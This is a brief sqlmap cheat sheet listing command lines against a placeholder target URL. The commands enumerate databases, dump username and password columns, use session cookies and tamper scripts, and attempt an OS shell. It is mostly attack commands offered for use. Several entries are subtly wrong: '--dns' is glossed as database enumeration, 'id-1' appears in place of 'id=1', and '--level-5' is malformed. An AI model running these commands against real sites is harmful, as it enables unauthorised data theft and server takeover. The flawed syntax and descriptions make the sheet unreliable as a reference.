SQLMAP Commands
sqlmap -u "http://target.com/page.php?id=1" --batch
Auto-run with defaults (non-interactive).
sqlmap -u "http://target.com/page.php?id=1" --dns
Enumerates database.
sqlmap -u "http://target.com/page.php?id=1" -D users_db --tables
List tables in a specific database.
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users --columns
List columns in a specific table.
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users -C username,password --dump
Dump specific columns (data exfiltration).
sqlmap -u "http://target.com/page.php?id=1" --technique=BEUST
Forces which SQL Injection techniques to try (B/E/U/S/T).
sqlmap -u "http://target.com/page.php?id-1" --level-5 --risk=3
Increase test depth (level) and payload risk (risk).
sqlmap -u "http://target.com/page.php?id-1" --cookie="PHPSESSID=yxz" --threads=10
Use session cookie + speed up the threads.
sqlmap -u "http://target.com/page.php?id-1" --dbms=MySQL
Hint the DBMS to reduce false positives/speed up.
sqlmap -u "http://target.com/page.php?id-1" --proxy="http://127.0.0.1:8080" --tamper=space2comment
Route through proxy (e.g., Burp) and use tamper script.
sqlmap -u "http://target.com/page.php?id-1" --os-shell
Try to get an OS shell (aggressive, noisy, and requires privileges).
sqlmap -u "http://target.com/page.php?id-1" --flush-session
Clear stored session data for this target.